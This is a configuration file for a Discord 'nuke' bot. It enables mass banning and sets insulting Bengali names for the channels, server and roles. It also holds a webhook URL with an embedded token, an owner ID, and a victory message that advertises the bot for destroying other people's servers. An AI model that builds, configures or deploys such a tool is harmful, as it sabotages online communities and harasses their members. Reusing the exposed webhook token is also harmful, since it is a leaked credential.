BOT_TOKEN=""
BOT_OWNER_ID="713758139425751150"

MASS_BAN=true

WEBHOOK_URL="https://discord.com/api/webhooks/1334945213998698600/tYGPfIxWTV4412RwUOhVGSn8XvgvqxKYi9lpJaFkM30sYq0wh_PYNoFeDImOfL3Y44BO"
AVATAR_URL="https://i.imgur.com/9Ahbgx4.jpeg"

PREFERRED_LOCALE="el"

CHANNEL_NAME="tor baap pial"
SERVER_NAME="<<shobar baap pial>>"
ROLE_NAME="pial on top"


EMBED_TITLE="Your server has been nuked by pial aka tor baap"
EMBED_DESCRIPTION="```pialer ei bot is one of the most powerful discord nuke bot. Unfortunately this server has been nuked due to inactive admins.```\n\n### If you're interested in this bot or you need to destroy somebody's server you can join our discord server.\n\n\n**Blood Group has:**\n\n* `Powerful bots with uptime 24/7`\n* `Good community`\n"
